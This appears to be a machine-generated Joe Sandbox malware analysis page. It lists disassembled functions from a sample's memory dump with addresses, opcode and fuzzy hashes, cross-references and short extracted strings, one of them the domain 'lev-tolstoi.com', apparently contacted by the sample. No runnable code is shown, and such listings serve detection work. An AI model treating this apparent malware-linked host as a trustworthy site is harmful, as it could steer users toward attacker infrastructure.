Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: wh
API String ID: 0-1657672868
Opcode ID: 34f5e35ccb0b7067b75c91b565eb4a1bebf6d54a11298902348dd9cd03349970
Instruction ID: 57d3a3825b2d42f5a7cfc181a0f401970f1dc9900973f97b9cd2b46a36910ecf
Opcode Fuzzy Hash: 34f5e35ccb0b7067b75c91b565eb4a1bebf6d54a11298902348dd9cd03349970
Instruction Fuzzy Hash: E57146B1A083518BC724CF29C8917A7B7E1EFD6314F18856EE8C59B391E738D841CB96

Function 00426B90 Relevance: 1.5, Strings: 1, Instructions: 246COMMON

Download Yara Rule

Strings

%&, xrefs: 00426E0D

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: %&
API String ID: 0-2066171877
Opcode ID: 39e65b155247fb68aa354ac9a8c2dfa4964aebb8e2009788d167cb395f4039b7
Instruction ID: ba67d0a08b93d8a532d907c39b2aeb07db53e999ca3775cdf0b4e574211894b0
Opcode Fuzzy Hash: 39e65b155247fb68aa354ac9a8c2dfa4964aebb8e2009788d167cb395f4039b7
Instruction Fuzzy Hash: 247133B16083648FC320DF59D89126BBBE1FF81314F558A2DE8C99B391E778D905CB4A

Function 0042BA60 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 0042BC5E

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: 3fcf3b7e11eebe149ab50efa3b977903c19f43c43c449435da1c0d4673b0aaa2
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: C471F432B083654BD714CE2DE48031FBBE2EBC5710FA9892EE4948B395D7789C4587CA

Function 0041CCE0 Relevance: 1.5, Strings: 1, Instructions: 212COMMON

Download Yara Rule

Strings

m-/., xrefs: 0041CE80

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: m-/.
API String ID: 0-374804691
Opcode ID: 10df7c0927279d599bbc2b1c4350d7d9daca7d2e09ddbd10f2920e73c01e872e
Instruction ID: 8029fe4a6e084aab313aff5584cac9410d32c3f4a75129ce2f3e7285e8e18ee5
Opcode Fuzzy Hash: 10df7c0927279d599bbc2b1c4350d7d9daca7d2e09ddbd10f2920e73c01e872e
Instruction Fuzzy Hash: C35121715583918FD720CF25C8916ABBBB1FFC2360F08895DE4D19B341E3789906CB9A

Function 0041FA90 Relevance: 1.5, Strings: 1, Instructions: 207COMMON

Download Yara Rule

Strings

`;M, xrefs: 0041FA92

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: `;M
API String ID: 0-2952404845
Opcode ID: 6cff6802aec7d43d6afe4903be649ea9db6507cac3bf9239e3dd86b04a7a1eff
Instruction ID: 059b4de344f0389fcfbd0a129ab4866e355394416160b2f9847d785eba38f098
Opcode Fuzzy Hash: 6cff6802aec7d43d6afe4903be649ea9db6507cac3bf9239e3dd86b04a7a1eff
Instruction Fuzzy Hash: 126116337499810B932C893C8C602A67E835FD3330B3DC37AA5B58B3E9EA6948475349

Function 004293A4 Relevance: 1.4, Strings: 1, Instructions: 198COMMON

Download Yara Rule

Strings

cH, xrefs: 00429457

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: cH
API String ID: 0-3891681731
Opcode ID: b0286fa987ccb7d38c4bef9e1ffea049064d792fd76be4888d3d1c585ff3594d
Instruction ID: 5a3540364b03d32e2755996e1588e4c4bf5e6fcc8c1ce636bb50cea786306823
Opcode Fuzzy Hash: b0286fa987ccb7d38c4bef9e1ffea049064d792fd76be4888d3d1c585ff3594d
Instruction Fuzzy Hash: 1851CFB4A083109BDB149F14E89176BB3E0FF86318F45842EF98587392E7799905CB5B

Function 0042A042 Relevance: 1.4, Strings: 1, Instructions: 168COMMON

Download Yara Rule

Strings

;<, xrefs: 0042A1D5

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: ;<
API String ID: 0-1376026944
Opcode ID: d898f53aa03617f15bac6c74d71236b879ade587a51a1bedccbaf83da38731de
Instruction ID: 9cde48f63d3f863bbeb00c4fedb2d4330b83cf6f130183c201983538b763c930
Opcode Fuzzy Hash: d898f53aa03617f15bac6c74d71236b879ade587a51a1bedccbaf83da38731de
Instruction Fuzzy Hash: 1251C677A4C3764BC324CE58884129FB7E2EBC5314F06892DD8D5DB685D678C90A8BC6

Function 0040D944 Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

]Q, xrefs: 0040D9BB

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: ]Q
API String ID: 0-1386238084
Opcode ID: 9ee633cbffeec24301bc9ee74d8ab62390766e60986ec8a693bca4f8303c0cc1
Instruction ID: 7674b9bde48a79ed188641be95737b09a4377f1f2bc68134c543ae7050d78e26
Opcode Fuzzy Hash: 9ee633cbffeec24301bc9ee74d8ab62390766e60986ec8a693bca4f8303c0cc1
Instruction Fuzzy Hash: 041157A081928056C325D3285862CAFB5A15FAB709F08493DE49E273C2F734190AC79F

Function 0040CA7B Relevance: 1.3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

Strings

lev-tolstoi.com, xrefs: 0040CACA

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: lev-tolstoi.com
API String ID: 0-483096278
Opcode ID: 7e116934128e7b329df8b5df8cf6f88a142cd16d4d5d78efb2c564c3ccd9051a
Instruction ID: e42ab6920fa7e1b818accf4144c5c14fd58737eb9f3163073b888ddf25c70b96
Opcode Fuzzy Hash: 7e116934128e7b329df8b5df8cf6f88a142cd16d4d5d78efb2c564c3ccd9051a
Instruction Fuzzy Hash: FCF0467678C3410BC3188F61ACE122BBB92ABD2200F1DB03EFA83D3341D6B0C811860E

Function 00407420 Relevance: .6, Instructions: 625COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6601933104a0014dbbb888b1c5739740612fe55e3edcf04a83a428248235a3ac
Instruction ID: fe507e6598e1cbec821715aad6da8095f7e4ae4a1a1870cc0040845d548402d1
Opcode Fuzzy Hash: 6601933104a0014dbbb888b1c5739740612fe55e3edcf04a83a428248235a3ac
Instruction Fuzzy Hash: 6122B372A087118BC725DF18D9806ABB3E1BFC4319F19893ED9C6A7385D738B8118B57

Function 0041248A Relevance: .6, Instructions: 594COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 320b6add8e4b1bc69bed401e7947e97d0f3a4d1f5614b5d29e047bd57aa49e8e
Instruction ID: 54600cf9327cb17f4943d5d288c84767bdf726ba7c34c8ce2185d9069d9f23c2
Opcode Fuzzy Hash: 320b6add8e4b1bc69bed401e7947e97d0f3a4d1f5614b5d29e047bd57aa49e8e
Instruction Fuzzy Hash: 6232F5B5A08B408FD314EF38C585396BBE1AB55310F148A3ED4EAC7392E679F855CB42

Function 00428A18 Relevance: .5, Instructions: 536COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fddc0d456cbf10c81b18f316bcbee226f4c719bd6559f92519bd4faaccac97c0
Instruction ID: c3d464ee29c9662ed1a65180e0f7ea9d4aafaebe73e5e32226f9eace3ae65858
Opcode Fuzzy Hash: fddc0d456cbf10c81b18f316bcbee226f4c719bd6559f92519bd4faaccac97c0
Instruction Fuzzy Hash: 601245B5A09351CFE3208F28E88072BB7E1AF8B320F1A467DE59967391D7749D04CB56

Function 00438910 Relevance: .4, Instructions: 433COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01db1e6343fda82ec7f5e193a2e153ac06d41d2419b5769643db63438ae9b425
Instruction ID: 5964a9edaa7296345443dc599158acd1ffba8d47dfb53a771b15ccf0185069bd
Opcode Fuzzy Hash: 01db1e6343fda82ec7f5e193a2e153ac06d41d2419b5769643db63438ae9b425
Instruction Fuzzy Hash: 5BC177756093004BD324DF20C880A6FF7A2EBD9354F29A92EF49553341DB38DC069BAB

Function 00405950 Relevance: .4, Instructions: 400COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34d60479625b4e57725f00c6be3d15581f9650337d0a574c0228bfc0cac6bec2
Instruction ID: 9a0cb70a8fffd754146a8111295813e3a77efb61d788ea2ed1b8da3728b5ef47
Opcode Fuzzy Hash: 34d60479625b4e57725f00c6be3d15581f9650337d0a574c0228bfc0cac6bec2
Instruction Fuzzy Hash: 1FE18A711087418FD720CF29C880A2BBBE1EF99300F44882EE5D597792E679E944CBA6

Function 0043BBD0 Relevance: .4, Instructions: 356COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72e49df5ada32d940760f69b05af5cb37587ef783ed18668a529b81b407ca231
Instruction ID: 42d072f3523506e66f78ce39eeb68de479f1329a49ab529099cf9a137a18b324
Opcode Fuzzy Hash: 72e49df5ada32d940760f69b05af5cb37587ef783ed18668a529b81b407ca231
Instruction Fuzzy Hash: BEC1E67160C3914BC325CF2DC49062EBBE1AFD9314F19866EE5E58B392C738D845CB96

Function 0041F390 Relevance: .3, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97b28338cb439298e84310808a9c07277fb1d738b99ec4b16146085eee19b93c
Instruction ID: 1cded7bd987fd4ccd873280799446d377915736a3159345200abe1de19617c4d
Opcode Fuzzy Hash: 97b28338cb439298e84310808a9c07277fb1d738b99ec4b16146085eee19b93c
Instruction Fuzzy Hash: 32B14875504300AFD7109F24DC41B5ABBE1BBE8318F148A3EF898932A1E7369D5A8B46

Function 004061B0 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fb6d9e53bc7d8c24d2af6d223319f06daf9bbbcbc60f630cafb1600c1bf419
Instruction ID: ccd6ab73e7c67af0eb1cc51aaf64db27bd0929b5a12fb4bb7a4aed1dd42849d1
Opcode Fuzzy Hash: 80fb6d9e53bc7d8c24d2af6d223319f06daf9bbbcbc60f630cafb1600c1bf419
Instruction Fuzzy Hash: 6BC16BB29087418FC360CF28DC96BABB7E1BF85318F09492DD1DAD6342E778A155CB46

Function 0041F0A0 Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1763d96da88c7464dd994feac06f4e6b37c312ebdcdcbd9838d3f5c16c18a448
Instruction ID: 3d98d7d7c9fe640716d66353307ce543177bc8d3b6063b995230530f646e3e5c
Opcode Fuzzy Hash: 1763d96da88c7464dd994feac06f4e6b37c312ebdcdcbd9838d3f5c16c18a448
Instruction Fuzzy Hash: E4915C36A042619FC725CE28C8507AF77D1AB85324F19863EECBA873C1D7399C0A97C1

Function 00429AA5 Relevance: .2, Instructions: 245COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89b25b7cd0c97384002f64a34727255ccfacb7a9636dfab79ff284406c3d75c7
Instruction ID: c290d45bf97abeaf76b1709bef3619cacd9d52dfdeceb7540b82a236ff489501
Opcode Fuzzy Hash: 89b25b7cd0c97384002f64a34727255ccfacb7a9636dfab79ff284406c3d75c7
Instruction Fuzzy Hash: 6D91E1B19083919FD714DF24D84166BBBF1AF86314F84892EF5D54B3A2E239EC05CB4A

Function 0043B030 Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f3a215d8d29dc167e79f2aac739a1c0d8174ceaa2932c158e99fca48a3de499a
Instruction ID: 7aeb77f7c2bd98fdc109b22532d399021c8efd6b8d95f1d4b3b3025c07f89934
Opcode Fuzzy Hash: f3a215d8d29dc167e79f2aac739a1c0d8174ceaa2932c158e99fca48a3de499a
Instruction Fuzzy Hash: 09513D35A043104BDB109E69CCC436BB792FBC9360F169A7ADA9867390D7749C42CBD6

Function 00430C20 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83e6483d3c91eb9288a52836f1717b22d7083e7b34c7777a63dfb86d97a6f055
Instruction ID: bc97d5732c7096b1fe4bde9af75fd5c5fccaf89bce8270158acf38cfdfe14c41
Opcode Fuzzy Hash: 83e6483d3c91eb9288a52836f1717b22d7083e7b34c7777a63dfb86d97a6f055
Instruction Fuzzy Hash: 07712426749A9147D32D8A3C4C322BB7E934FD6230F2DD76EE5F28B3E1C56948068345

Function 00432940 Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0522f92cb967cb04bcfe8c436c3d46c2924353cc09c8de9d74365f84beded12b
Instruction ID: 1763a5ee92f4209920b35872094cb6635880f7b590a83c99dfbd89e2c2929837
Opcode Fuzzy Hash: 0522f92cb967cb04bcfe8c436c3d46c2924353cc09c8de9d74365f84beded12b
Instruction Fuzzy Hash: 2B61453775A9914BD3288E3D5D113AABA834BDB334F3DD36EA4B58B3E4C5AC88024345

Function 0041C830 Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4bad4211c1db5a0c4e645fed4d3ef18b4956e73ffbcc1fea4d29399f1885e46
Instruction ID: 69df4fefb61e95742197b3404f2a7e768cb7568a21b19ea3a27a5f4d3b32f3ff
Opcode Fuzzy Hash: e4bad4211c1db5a0c4e645fed4d3ef18b4956e73ffbcc1fea4d29399f1885e46
Instruction Fuzzy Hash: 247108152046410AD72CDF7485A333B7AE6AF44308B1991BFD995CF697EA7DC103878E

Function 0043F310 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 433b336b5b7cc08ab1281e325f16a96bba4b3958c397bf11549b44bdc4ad4d22
Instruction ID: f65c67b60719a1ca6b9901d6ff8965707225101a1c4d3470b90ea40d961e6437
Opcode Fuzzy Hash: 433b336b5b7cc08ab1281e325f16a96bba4b3958c397bf11549b44bdc4ad4d22
Instruction Fuzzy Hash: F4514A36B453005BE7189F29CC90B6BB792EBD4320F19963DE885473D0DB38AC058789

Function 00437300 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9abe8c44c26af862b47efc8752dedb34ee98c1e19f4fcb0d6898b391e07fa6b9
Instruction ID: 15d456820b403251f7606f293db7b2b9b80c8eb9586c925c4abcef4b8340a49b
Opcode Fuzzy Hash: 9abe8c44c26af862b47efc8752dedb34ee98c1e19f4fcb0d6898b391e07fa6b9
Instruction Fuzzy Hash: 29515CB15087549FE324DF29D49475BBBE1BB88318F044E2EE4E987350E379DA088F96

Function 004254E9 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bdb81da23b52f918e4cb982224e4b0a7eadefb7c206a9e811a19e8acde9f628
Instruction ID: d3f121329a3249eee32b9ce95a067a39ea28aa362b10f586c10c87bea3a21832
Opcode Fuzzy Hash: 1bdb81da23b52f918e4cb982224e4b0a7eadefb7c206a9e811a19e8acde9f628
Instruction Fuzzy Hash: F15176B1B093A18BDB30CE6494412EBB7E0EF56340F86493FC8C587381E63C9805E34A

Function 00432BC0 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d971545b6e012707843a1dbcb1bd85669b151070c4a7855941c2288014f4fad8
Instruction ID: 1e060f94fe45e47c35fedcafb78fc0105fa796ee8a6d526f5f53e33bc6cdd69a
Opcode Fuzzy Hash: d971545b6e012707843a1dbcb1bd85669b151070c4a7855941c2288014f4fad8
Instruction Fuzzy Hash: F5515937B199A14BC7184E3C5D603A97A534BAB330B2D933FB5B18B3D1C5A88C125359

Function 0041B295 Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 686dae65ad203321fff4286047bcdf564e1cde2190e825a17d50878d44262c00
Instruction ID: b624d867613f48578dc8ee63be475a9463b009dc9a925208f9f76bd2b27ea290
Opcode Fuzzy Hash: 686dae65ad203321fff4286047bcdf564e1cde2190e825a17d50878d44262c00
Instruction Fuzzy Hash: 4B4102729143548BD329CB29C8613E7B3A2FFDA311F09856DC9CA8B399EB3858418391

Function 0043092C Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da577a0a5d9dd1218a37203d54b1921698a7272595eaf6be71f58efab4809eba
Instruction ID: 67f8aae275306a347e5827db6d301b6ba8e57761617a3b3087d302a472e326d9
Opcode Fuzzy Hash: da577a0a5d9dd1218a37203d54b1921698a7272595eaf6be71f58efab4809eba
Instruction Fuzzy Hash: 9C618FB2608B818FD315AF39D49229BBFE19F99304F08C87DD4DE87742D634A509CB56

Function 0043C28F Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0292b0a97f27e26d4e5ad670a45b6074c2ec285fa932f8b733ea163fa43ec7b7
Instruction ID: 64589ad42b6f13230785113a18663ce0d43325b0c3f48c6433725dd65be8ef29
Opcode Fuzzy Hash: 0292b0a97f27e26d4e5ad670a45b6074c2ec285fa932f8b733ea163fa43ec7b7
Instruction Fuzzy Hash: FF4120B6A193406BE304DF22FC5265B7AA3EBD5309F18C43DE84447317E539C6098B49

Function 00402B80 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d00e0fc4da09a6ae6cddbd763618d0d6aaee8a47fc11dcfe2916fa315513b37
Instruction ID: d1fb7509076af1ffb50b7779203579908b40d0ff30a95e45ae09fd1c6e327928
Opcode Fuzzy Hash: 0d00e0fc4da09a6ae6cddbd763618d0d6aaee8a47fc11dcfe2916fa315513b37
Instruction Fuzzy Hash: A811043BB2962107E350DE26DCD861B7752EBD631070A0076EE41E73E2CAB5F841D1A4

Function 0040E1A2 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86eafbf284ae91bd7090555c26a2661bfabd90b69a551cbdb49ac481f3dcd4b6
Instruction ID: 8c1538aadde9067d7f50c33328b7dd90109b5701599d711617560ca2cb3267e3
Opcode Fuzzy Hash: 86eafbf284ae91bd7090555c26a2661bfabd90b69a551cbdb49ac481f3dcd4b6
Instruction Fuzzy Hash: 46210B7AA152018BD724DB25CC41A7BF397EBC4304F19DA7DD8C2A7298DB34AC158786

Function 00435210 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 4880154dcf8b0d0f21340028b50a9d6186b0c3c31601bb0eff288ffcf82f82b1
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 2E112933A045D40EC3128D3C8400566BFE30ADB334F5D53DAF4B89B3D2D6268D8A8B59

Function 0042ABCE Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

